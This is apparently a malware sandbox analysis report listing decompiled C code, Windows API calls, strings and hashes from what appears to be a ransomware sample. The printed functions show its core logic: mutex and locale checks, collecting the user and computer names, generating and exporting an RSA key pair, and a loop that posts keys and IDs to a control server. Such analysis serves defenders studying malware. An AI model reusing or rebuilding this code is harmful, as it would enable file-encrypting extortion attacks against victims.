                                    0x0f58588d
                                    0x0f58588e
                                    0x0f585890
                                    0x0f585893
                                    0x0f585895
                                    0x0f585896
                                    0x0f58589f
                                    0x0f5858a8
                                    0x0f5858b9
                                    0x0f5858bb
                                    0x0f5858c4
                                    0x0f5858ca
                                    0x0f5858d0
                                    0x0f5858d6
                                    0x0f5858d8
                                    0x0f5858dc
                                    0x0f5858e3
                                    0x0f5858ec
                                    0x0f585901
                                    0x0f585905
                                    0x0f5858f2
                                    0x0f5858f2
                                    0x0f5858f5
                                    0x0f5858f9
                                    0x0f5858fd
                                    0x0f5858fd
                                    0x0f58590f
                                    0x0f585916
                                    0x0f58592f
                                    0x0f58592f
                                    0x0f585931
                                    0x0f585918
                                    0x0f585918
                                    0x0f58591d
                                    0x00000000
                                    0x0f58591f
                                    0x0f58591f
                                    0x0f585921
                                    0x0f585925
                                    0x0f585927
                                    0x0f585929
                                    0x0f585929
                                    0x0f58591d
                                    0x0f58593a
                                    0x0f58593e
                                    0x0f58594d
                                    0x0f58594f
                                    0x0f58594f
                                    0x0f58595b
                                    0x0f585d98
                                    0x0f585da3
                                    0x0f585da9
                                    0x0f585db9
                                    0x0f585961
                                    0x0f585961
                                    0x0f58596d
                                    0x0f585980
                                    0x0f585985
                                    0x0f585999
                                    0x0f5859a2
                                    0x0f5859b6
                                    0x0f5859bb
                                    0x0f5859c5
                                    0x0f5859c9
                                    0x0f5859cd
                                    0x0f5859d5
                                    0x0f5859d7
                                    0x0f5859db
                                    0x0f5859de
                                    0x0f5859f5
                                    0x0f5859e4
                                    0x0f5859e7
                                    0x0f5859eb
                                    0x0f5859ef
                                    0x0f5859ef
                                    0x0f585a00
                                    0x0f585a06
                                    0x0f585a10
                                    0x0f585a10
                                    0x0f585a1c
                                    0x0f585a22
                                    0x0f585a24
                                    0x0f585a30
                                    0x0f585a30
                                    0x0f585a34
                                    0x0f585a39
                                    0x0f585a3f
                                    0x0f585a41
                                    0x0f585a41
                                    0x0f585a43
                                    0x0f585a46
                                    0x0f585a4a
                                    0x0f585a4a
                                    0x0f585a4f
                                    0x0f585a55
                                    0x0f585a57
                                    0x0f585a5b
                                    0x0f585a60
                                    0x0f585a60
                                    0x0f585a65
                                    0x0f585a6b
                                    0x0f585a6e
                                    0x0f585a6e
                                    0x0f585a73
                                    0x0f585a74
                                    0x0f585a76
                                    0x0f585a7a
                                    0x0f585a60
                                    0x0f585a7e
                                    0x0f585a8e
                                    0x0f585a9b
                                    0x0f585a9f
                                    0x0f585aa3
                                    0x0f585aac
                                    0x0f585ab8
                                    0x0f585ac0
                                    0x0f585ac7
                                    0x0f585aca
                                    0x0f585aca
                                    0x0f585ad6
                                    0x0f585ad8
                                    0x0f585ade
                                    0x0f585aea
                                    0x0f585af0
                                    0x0f585af9
                                    0x0f585b0d
                                    0x0f585b17
                                    0x0f585b19
                                    0x0f585b23
                                    0x0f585b30
                                    0x0f585b4a
                                    0x0f585b50
                                    0x0f585b5a
                                    0x0f585b61
                                    0x0f585b63
                                    0x0f585b79
                                    0x0f585b88
                                    0x0f585ba6
                                    0x0f585bb6
                                    0x0f585bbc
                                    0x0f585bc3
                                    0x0f585bc9
                                    0x0f585bd3
                                    0x0f585bcf
                                    0x0f585bcf
                                    0x0f585bcf
                                    0x0f585bd9
                                    0x0f585bdb
                                    0x0f585be1
                                    0x0f585be7
                                    0x0f585bf1
                                    0x0f585bf1
                                    0x0f585c0b
                                    0x0f585c11
                                    0x0f585c18
                                    0x0f585c25
                                    0x0f585c2b
                                    0x0f585c2b
                                    0x0f585c36
                                    0x0f585c3b
                                    0x0f585c4b
                                    0x0f585c67
                                    0x0f585c69
                                    0x0f585c69
                                    0x0f585c79
                                    0x0f585c79
                                    0x0f585c86
                                    0x0f585c8c
                                    0x0f585c8c
                                    0x0f585c8f
                                    0x0f585c95
                                    0x0f585c9f
                                    0x0f585c9f
                                    0x0f585c97
                                    0x0f585c97
                                    0x0f585c9d
                                    0x00000000
                                    0x00000000
                                    0x0f585c9d
                                    0x0f585ca8
                                    0x0f585cae
                                    0x0f585cb4
                                    0x0f585cb8
                                    0x0f585cb8
                                    0x0f585cbd
                                    0x0f585cc3
                                    0x0f585cc6
                                    0x0f585cc6
                                    0x0f585ccb
                                    0x0f585ccc
                                    0x0f585cce
                                    0x0f585cd2
                                    0x0f585cb8
                                    0x0f585cd6
                                    0x0f585cec
                                    0x0f585cf9
                                    0x0f585d03
                                    0x0f585d0d
                                    0x0f585d5c
                                    0x0f585d62
                                    0x0f585d67
                                    0x0f585d67
                                    0x0f585d7b
                                    0x0f585d89
                                    0x0f585d96
                                    0x00000000
                                    0x0f585d0f
                                    0x0f585d20
                                    0x0f585d2e
                                    0x0f585d3b
                                    0x0f585d48
                                    0x0f585d4e
                                    0x0f585d5b
                                    0x0f585d5b
                                    0x0f585d0d

                                    APIs
                                      • Part of subcall function 0F583BC0: GetProcessHeap.KERNEL32(?,?,0F584807,00000000,?,00000000,00000000), ref: 0F583C5C
                                      • Part of subcall function 0F587490: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F5874B7
                                      • Part of subcall function 0F587490: GetUserNameW.ADVAPI32 ref: 0F5874C8
                                      • Part of subcall function 0F587490: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F5874E6
                                      • Part of subcall function 0F587490: GetComputerNameW.KERNEL32 ref: 0F5874F0
                                      • Part of subcall function 0F587490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F587510
                                      • Part of subcall function 0F587490: wsprintfW.USER32 ref: 0F587551
                                      • Part of subcall function 0F587490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F58756E
                                      • Part of subcall function 0F587490: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F587592
                                      • Part of subcall function 0F587490: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0F584810,?), ref: 0F5875B6
                                      • Part of subcall function 0F587490: RegCloseKey.KERNEL32(00000000), ref: 0F5875D2
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5872F2
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5872FD
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587313
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F58731E
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587334
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F58733F
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587355
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(0F584B36,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587360
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587376
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587381
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587397
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873A2
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873C1
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873CC
                                    • VirtualAlloc.KERNEL32(00000000,00000008,00003000,00000040,00000001,00000000,00000001,00000001,00000000,00000001), ref: 0F5858D0
                                    • CryptBinaryToStringA.CRYPT32(00000000,00000000,40000001,00000000,?), ref: 0F585980
                                    • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0F585999
                                    • lstrlenA.KERNEL32(00000000), ref: 0F5859A2
                                    • lstrlenA.KERNEL32(?), ref: 0F5859AA
                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 0F5859BB
                                    • lstrlenA.KERNEL32(?), ref: 0F5859D5
                                    • lstrlenA.KERNEL32(00000000), ref: 0F5859FE
                                    • lstrlenA.KERNEL32(?), ref: 0F585A1E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$AllocVirtual$BinaryCryptNameString$CloseComputerHeapOpenProcessQueryUserValuewsprintf
                                    • String ID: &id=$&priv_key=$&pub_key=$&subid=$&version=2.3.1r$action=call&$popkadurak
                                    • API String ID: 1618292170-4215222798
                                    • Opcode ID: ed4d01eab58d5800b8f374295f3d3ace532f31e026151068d10b980563f866e4
                                    • Instruction ID: b9584b2a845e0a2e827ca7c1910d1fc0087ab1b871bccb272c95d9676d165f48
                                    • Opcode Fuzzy Hash: ed4d01eab58d5800b8f374295f3d3ace532f31e026151068d10b980563f866e4
                                    • Instruction Fuzzy Hash: C0F1AC71208301AFD710EF24DC85B6BBBA9FF88725F04092DF585B7291E774A90ACB56
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    C-Code - Quality: 100%
                                    			_entry_() {
                                    				void* _v8;
                                    				void* _v12;
                                    				CHAR* _v16;
                                    				int _v20;
                                    				void* _v24;
                                    				int _v28;
                                    				void* _v32;
                                    				int _v36;
                                    				int _v40;
                                    				int _v44;
                                    				int _v48;
                                    				int _v52;
                                    				int _v60;
                                    				char _v80;
                                    				void* _t54;
                                    				void* _t55;
                                    				int _t79;
                                    				void* _t81;
                                    				short* _t97;
                                    				void* _t114;
                                    
                                    				Sleep(0x3e8); // executed
                                    				_t54 = E0F5847D0(_t90, _t106); // executed
                                    				if(_t54 == 0) {
                                    					_t55 = CreateThread(0, 0, E0F582D30, 0, 0, 0); // executed
                                    					_v8 = _t55;
                                    					if(_v8 != 0) {
                                    						if(WaitForSingleObject(_v8, 0x1388) == 0x102) {
                                    							_t90 = _v8;
                                    							TerminateThread(_v8, 0);
                                    						}
                                    						_t106 = _v8;
                                    						CloseHandle(_v8); // executed
                                    					}
                                    					E0F5848C0(); // executed
                                    					E0F5842B0(_t90, _t106); // executed
                                    					E0F586550( &_v80); // executed
                                    					_v40 = 0;
                                    					_v36 = 0;
                                    					_v28 = 0;
                                    					_v44 = 0;
                                    					E0F586500( &_v80,  &_v28,  &_v44,  &_v40,  &_v36);
                                    					_v48 = 0;
                                    					_v16 = 0;
                                    					if(E0F584B00(_v28) == 0) {
                                    						while(_v48 == 0) {
                                    							_t81 = E0F585860(_v28, _v44, _v40, _v36,  &_v16); // executed
                                    							_t114 = _t114 + 0xc;
                                    							if(_t81 != 0) {
                                    								_v48 = 1;
                                    							} else {
                                    								Sleep(0x2710);
                                    							}
                                    						}
                                    						E0F5864C0( &_v80);
                                    						_v32 = 0;
                                    						_v20 = 0;
                                    						_v52 = 0;
                                    						_v60 = 0;
                                    						__eflags = _v16;
                                    						if(_v16 == 0) {
                                    							L19:
                                    							E0F584200();
                                    							InitializeCriticalSection(0xf592a48);
                                    							__eflags = _v52;
                                    							if(__eflags == 0) {
                                    								E0F583FF0( &_v80);
                                    							} else {
                                    								E0F5841D0(_v32, _v20, __eflags);
                                    							}
                                    							DeleteCriticalSection(0xf592a48);
                                    							__eflags = E0F583C70();
                                    							if(__eflags != 0) {
                                    								E0F5845B0(__eflags);
                                    							}
                                    							_v24 = VirtualAlloc(0, 0x200, 0x3000, 4);
                                    							__eflags = _v24;
                                    							if(__eflags != 0) {
                                    								GetModuleFileNameW(0, _v24, 0x100);
                                    								E0F583DB0(_v24, _v24, __eflags);
                                    								VirtualFree(_v24, 0, 0x8000);
                                    							}
                                    							__eflags =  *0xf592a44;
                                    							if( *0xf592a44 != 0) {
                                    								_t97 =  *0xf592a44; // 0x27c0000
                                    								ShellExecuteW(0, L"open", _t97, 0, 0, 5);
                                    							}
                                    							ExitThread(0);
                                    						}
                                    						_v20 = lstrlenA(_v16);
                                    						_v32 = VirtualAlloc(0, _v20, 0x3000, 4);
                                    						_t79 = CryptStringToBinaryA(_v16, 0, 1, _v32,  &_v20, 0, 0);
                                    						__eflags = _t79;
                                    						if(_t79 != 0) {
                                    							_v52 = 1;
                                    							goto L19;
                                    						}
                                    						ExitProcess(0);
                                    					} else {
                                    						_v12 = VirtualAlloc(0, 0x200, 0x3000, 4);
                                    						_t119 = _v12;
                                    						if(_v12 != 0) {
                                    							GetModuleFileNameW(0, _v12, 0x100);
                                    							E0F583DB0(_v12,  &_v44, _t119);
                                    							VirtualFree(_v12, 0, 0x8000);
                                    						}
                                    						ExitProcess(0);
                                    					}
                                    				}
                                    				ExitProcess(0);
                                    			}























                                    0x0f584b2b
                                    0x0f584b31
                                    0x0f584b38
                                    0x0f584b51
                                    0x0f584b57
                                    0x0f584b5e
                                    0x0f584b74
                                    0x0f584b78
                                    0x0f584b7c
                                    0x0f584b7c
                                    0x0f584b82
                                    0x0f584b86
                                    0x0f584b86
                                    0x0f584b8c
                                    0x0f584b91
                                    0x0f584b99
                                    0x0f584b9e
                                    0x0f584ba5
                                    0x0f584bac
                                    0x0f584bb3
                                    0x0f584bcd
                                    0x0f584bd2
                                    0x0f584bd9
                                    0x0f584bea
                                    0x0f584c3b
                                    0x0f584c53
                                    0x0f584c58
                                    0x0f584c5d
                                    0x0f584c6c
                                    0x0f584c5f
                                    0x0f584c64
                                    0x0f584c64
                                    0x0f584c73
                                    0x0f584c78
                                    0x0f584c7d
                                    0x0f584c84
                                    0x0f584c8b
                                    0x0f584c92
                                    0x0f584c99
                                    0x0f584c9d
                                    0x0f584cef
                                    0x0f584cef
                                    0x0f584cf9
                                    0x0f584cff
                                    0x0f584d03
                                    0x0f584d15
                                    0x0f584d05
                                    0x0f584d0b
                                    0x0f584d0b
                                    0x0f584d1f
                                    0x0f584d2a
                                    0x0f584d2c
                                    0x0f584d2e
                                    0x0f584d2e
                                    0x0f584d47
                                    0x0f584d4a
                                    0x0f584d4e
                                    0x0f584d5b
                                    0x0f584d64
                                    0x0f584d74
                                    0x0f584d74
                                    0x0f584d7a
                                    0x0f584d81
                                    0x0f584d89
                                    0x0f584d97
                                    0x0f584d97
                                    0x0f584d9f
                                    0x0f584d9f
                                    0x0f584ca9
                                    0x0f584cbf
                                    0x0f584cd6
                                    0x0f584cdc
                                    0x0f584cde
                                    0x0f584ce8
                                    0x00000000
                                    0x0f584ce8
                                    0x0f584ce2
                                    0x0f584bec
                                    0x0f584c00
                                    0x0f584c03
                                    0x0f584c07
                                    0x0f584c14
                                    0x0f584c1d
                                    0x0f584c2d
                                    0x0f584c2d
                                    0x0f584c35
                                    0x0f584c35
                                    0x0f584bea
                                    0x0f584b3c

                                    APIs
                                    • Sleep.KERNEL32(000003E8), ref: 0F584B2B
                                      • Part of subcall function 0F5847D0: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F58482C
                                      • Part of subcall function 0F5847D0: lstrcpyW.KERNEL32 ref: 0F58484F
                                      • Part of subcall function 0F5847D0: lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F584856
                                      • Part of subcall function 0F5847D0: CreateMutexW.KERNEL32(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F58486E
                                      • Part of subcall function 0F5847D0: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F58487A
                                      • Part of subcall function 0F5847D0: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F584881
                                      • Part of subcall function 0F5847D0: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F58489B
                                    • ExitProcess.KERNEL32 ref: 0F584B3C
                                    • CreateThread.KERNEL32 ref: 0F584B51
                                    • WaitForSingleObject.KERNEL32(00000000,00001388), ref: 0F584B69
                                    • TerminateThread.KERNEL32(00000000,00000000), ref: 0F584B7C
                                    • CloseHandle.KERNEL32(00000000), ref: 0F584B86
                                    • VirtualAlloc.KERNEL32(00000000,00000200,00003000,00000004,00000000,00000000,00000000,00000000), ref: 0F584BFA
                                    • GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F584C14
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F584C2D
                                    • ExitProcess.KERNEL32 ref: 0F584C35
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$AllocCreateErrorExitFreeLastProcessThread$CloseFileHandleModuleMutexNameObjectSingleSleepTerminateWaitlstrcpylstrlen
                                    • String ID: open
                                    • API String ID: 1803241880-2758837156
                                    • Opcode ID: dd0cbba130fb7e83b4753fdc3b36268d457670b9af8aeeef44f642284472b79e
                                    • Instruction ID: 17346e7ef18a8b9bef543064817a8e13a219e92cc9ee6d0296a6b9157c0ae95b
                                    • Opcode Fuzzy Hash: dd0cbba130fb7e83b4753fdc3b36268d457670b9af8aeeef44f642284472b79e
                                    • Instruction Fuzzy Hash: DC711170A4030AFBEB14EBE0DD59FEE7B74BB44712F104025E601BA2C1DBB8694ADB54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 445 f5882b0-f5882d5 CryptAcquireContextW 446 f5883c9-f5883d1 445->446 447 f5882db-f5882dd 445->447 448 f5882e0-f5882ec 447->448 448->448 449 f5882ee-f588305 VirtualAlloc 448->449 450 f58830b-f58830d 449->450 451 f5883d2-f5883f3 CryptReleaseContext VirtualFree 449->451 450->451 452 f588313-f588357 GetModuleHandleA 450->452 453 f588359-f588365 LoadLibraryA 452->453 454 f588367-f588374 GetProcAddress 452->454 453->454 455 f5883ae 453->455 454->455 456 f588376-f58837f 454->456 457 f5883b0-f5883c3 CryptReleaseContext VirtualFree 455->457 456->455 459 f588381-f588385 456->459 457->446 460 f5883a7-f5883ac 459->460 461 f588387-f58838a 459->461 460->457 462 f588391-f5883a5 461->462 462->460 462->462
                                    C-Code - Quality: 66%
                                    			E0F5882B0(intOrPtr __ecx, void* __edx) {
                                    				long* _v8;
                                    				intOrPtr _v12;
                                    				signed int _v16;
                                    				char _v20;
                                    				intOrPtr _v24;
                                    				intOrPtr _v28;
                                    				char _v32;
                                    				char _v34;
                                    				short _v36;
                                    				intOrPtr _v40;
                                    				intOrPtr _v44;
                                    				char _v48;
                                    				long** _t37;
                                    				void* _t40;
                                    				struct HINSTANCE__* _t45;
                                    				_Unknown_base(*)()* _t46;
                                    				signed int _t54;
                                    				long _t55;
                                    				intOrPtr _t56;
                                    				signed int _t58;
                                    				signed int _t60;
                                    				void* _t63;
                                    				void* _t64;
                                    				void* _t65;
                                    
                                    				_t54 = 0;
                                    				_v12 = __ecx;
                                    				_t37 =  &_v8;
                                    				_t63 = __edx;
                                    				__imp__CryptAcquireContextW(_t37, 0, 0, 1, 0xf0000000); // executed
                                    				if(_t37 == 0) {
                                    					L15:
                                    					return _t54;
                                    				} else {
                                    					_t58 = 0;
                                    					do {
                                    						_t3 = _t58 + 0x61; // 0x61
                                    						 *((short*)(_t65 + _t58 * 2 - 0x64)) = _t3;
                                    						_t58 = _t58 + 1;
                                    					} while (_t58 < 0x1a);
                                    					_t7 = _t63 + 1; // 0x1
                                    					_t55 = _t7;
                                    					_t40 = VirtualAlloc(0, _t55, 0x3000, 0x40); // executed
                                    					_t64 = _t40;
                                    					if(_t64 == 0 || _t63 >= _t55) {
                                    						CryptReleaseContext(_v8, 0);
                                    						VirtualFree(_t64, 0, 0x8000);
                                    						return 0;
                                    					} else {
                                    						_v48 = 0x70797243;
                                    						_v44 = 0x6e654774;
                                    						_v40 = 0x646e6152;
                                    						_v36 = 0x6d6f;
                                    						_v34 = 0;
                                    						_v32 = 0x61766441;
                                    						_v28 = 0x32336970;
                                    						_v24 = 0x6c6c642e;
                                    						_v20 = 0;
                                    						_t45 = GetModuleHandleA( &_v32);
                                    						if(_t45 != 0) {
                                    							L7:
                                    							_t19 =  &_v48; // 0x70797243
                                    							_t46 = GetProcAddress(_t45, _t19);
                                    							if(_t46 == 0) {
                                    								goto L13;
                                    							} else {
                                    								_push(_t64);
                                    								_push(_t63);
                                    								_push(_v8);
                                    								if( *_t46() == 0) {
                                    									goto L13;
                                    								} else {
                                    									_t60 = 0;
                                    									if(_t63 != 0) {
                                    										_t56 = _v12;
                                    										_v16 = 0x1a;
                                    										do {
                                    											asm("cdq");
                                    											 *((short*)(_t56 + _t60 * 2)) =  *((intOrPtr*)(_t65 + ( *(_t64 + _t60) & 0x000000ff) % _v16 * 2 - 0x64));
                                    											_t60 = _t60 + 1;
                                    										} while (_t60 < _t63);
                                    									}
                                    									_t54 = 1;
                                    								}
                                    							}
                                    						} else {
                                    							_t18 =  &_v32; // 0x61766441
                                    							_t45 = LoadLibraryA(_t18);
                                    							if(_t45 == 0) {
                                    								L13:
                                    								_t54 = 0;
                                    							} else {
                                    								goto L7;
                                    							}
                                    						}
                                    						CryptReleaseContext(_v8, 0);
                                    						VirtualFree(_t64, 0, 0x8000); // executed
                                    						goto L15;
                                    					}
                                    				}
                                    			}



























                                    0x0f5882c0
                                    0x0f5882c2
                                    0x0f5882c7
                                    0x0f5882ca
                                    0x0f5882cd
                                    0x0f5882d5
                                    0x0f5883c9
                                    0x0f5883d1
                                    0x0f5882db
                                    0x0f5882db
                                    0x0f5882e0
                                    0x0f5882e0
                                    0x0f5882e3
                                    0x0f5882e8
                                    0x0f5882e9
                                    0x0f5882f5
                                    0x0f5882f5
                                    0x0f5882fb
                                    0x0f588301
                                    0x0f588305
                                    0x0f5883d7
                                    0x0f5883e5
                                    0x0f5883f3
                                    0x0f588313
                                    0x0f588316
                                    0x0f58831e
                                    0x0f588325
                                    0x0f58832c
                                    0x0f588332
                                    0x0f588336
                                    0x0f58833d
                                    0x0f588344
                                    0x0f58834b
                                    0x0f58834f
                                    0x0f588357
                                    0x0f588367
                                    0x0f588367
                                    0x0f58836c
                                    0x0f588374
                                    0x00000000
                                    0x0f588376
                                    0x0f588376
                                    0x0f588377
                                    0x0f588378
                                    0x0f58837f
                                    0x00000000
                                    0x0f588381
                                    0x0f588381
                                    0x0f588385
                                    0x0f588387
                                    0x0f58838a
                                    0x0f588391
                                    0x0f588395
                                    0x0f58839e
                                    0x0f5883a2
                                    0x0f5883a3
                                    0x0f588391
                                    0x0f5883a7
                                    0x0f5883a7
                                    0x0f58837f
                                    0x0f588359
                                    0x0f588359
                                    0x0f58835d
                                    0x0f588365
                                    0x0f5883ae
                                    0x0f5883ae
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f588365
                                    0x0f5883b5
                                    0x0f5883c3
                                    0x00000000
                                    0x0f5883c3
                                    0x0f588305

                                    APIs
                                    • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F5882CD
                                    • VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F5882FB
                                    • GetModuleHandleA.KERNEL32(?), ref: 0F58834F
                                    • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F58835D
                                    • GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F58836C
                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F5883B5
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F5883C3
                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F5883D7
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F5883E5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
                                    • String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
                                    • API String ID: 3996966626-2152921537
                                    • Opcode ID: b4f569f273c729533baaee686f39f774d2f39718d2319693307fb1a54a19ce89
                                    • Instruction ID: f01aefa46416bb242e0ac05bfb1871327c79cb5ce4e052b8b584858dac1be2be
                                    • Opcode Fuzzy Hash: b4f569f273c729533baaee686f39f774d2f39718d2319693307fb1a54a19ce89
                                    • Instruction Fuzzy Hash: 9E314870A00209EBDB109FE4DD85BEEBB78FF04702F544069E601B6280EB389A17DB65
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 16%
                                    			E0F5863E0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                    				long* _v8;
                                    				long* _v12;
                                    				int _v16;
                                    				long** _t15;
                                    				long* _t16;
                                    				long _t23;
                                    
                                    				_t15 =  &_v8;
                                    				__imp__CryptAcquireContextW(_t15, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0xf0000000); // executed
                                    				if(_t15 != 0) {
                                    					L6:
                                    					_t16 = _v8;
                                    					__imp__CryptGenKey(_t16, 0xa400, 0x8000001,  &_v12); // executed
                                    					if(_t16 == 0) {
                                    					}
                                    					_v16 = 0;
                                    					__imp__CryptExportKey(_v12, 0, 6, 0, _a4, _a8);
                                    					__imp__CryptExportKey(_v12, 0, 7, 0, _a12, _a16); // executed
                                    					CryptDestroyKey(_v12);
                                    					CryptReleaseContext(_v8, 0);
                                    					__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0x10); // executed
                                    					return 1;
                                    				}
                                    				_t23 = GetLastError();
                                    				if(_t23 != 0x80090016) {
                                    					return 0;
                                    				}
                                    				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                    				if(_t23 != 0) {
                                    					goto L6;
                                    				}
                                    				return 0;
                                    			}









                                    0x0f5863f4
                                    0x0f5863f8
                                    0x0f586400
                                    0x0f586438
                                    0x0f586446
                                    0x0f58644a
                                    0x0f586452
                                    0x0f586452
                                    0x0f586455
                                    0x0f58646e
                                    0x0f586486
                                    0x0f586490
                                    0x0f58649c
                                    0x0f5864b1
                                    0x00000000
                                    0x0f5864b7
                                    0x0f586402
                                    0x0f58640d
                                    0x00000000
                                    0x0f586431
                                    0x0f58641e
                                    0x0f586426
                                    0x00000000
                                    0x0f58642f
                                    0x00000000

                                    APIs
                                    • CryptAcquireContextW.ADVAPI32(0F584B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,0F584B96,?,0F584B9E), ref: 0F5863F8
                                    • GetLastError.KERNEL32(?,0F584B9E), ref: 0F586402
                                    • CryptAcquireContextW.ADVAPI32(0F584B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F584B9E), ref: 0F58641E
                                    • CryptGenKey.ADVAPI32(0F584B9E,0000A400,08000001,?,?,0F584B9E), ref: 0F58644A
                                    • CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,?,00000000), ref: 0F58646E
